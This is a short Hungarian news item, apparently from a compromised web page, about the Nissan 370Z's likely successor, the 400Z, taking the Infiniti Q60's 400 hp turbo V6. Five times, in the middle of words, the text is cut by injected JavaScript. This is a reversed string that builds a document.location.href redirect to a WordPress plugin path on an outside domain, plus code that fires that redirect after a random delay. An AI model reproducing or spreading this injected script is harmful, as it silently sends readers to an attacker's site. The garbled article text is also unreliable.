Tizenegy év után megérett a cserére a Nissan 370Z. A 3,7 literes V6-os szívómotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tor helyére a jelek szerint az Infiniti Q60 3,0 literes, 400 lóerős turbómotoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torja kerül. Így míg a 370Z esetében a lökettérfogatoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tot jelölte a típusnév, az utódnál valószínűleg a teljesítményre utal majd – a brit Autoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tocar szerint éppen ezért 400Z-nak fogják hívni az autót. Persze nem váltoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tozatlan formában kapja meg a luxusszedán hajtásláncát a sportkupé. Összkerék- helyett hátsókerék-hajtású lesz, és ebből, valamint kisebb méretéből adódóan várhatóan dinamikusabb is lesz, mint a Q60, pedig az is 5 másodperc alatt gyorsul 100 km/órára. Ahogy maga az elnevezés, a bevezetés dátuma…
- Hirdetés -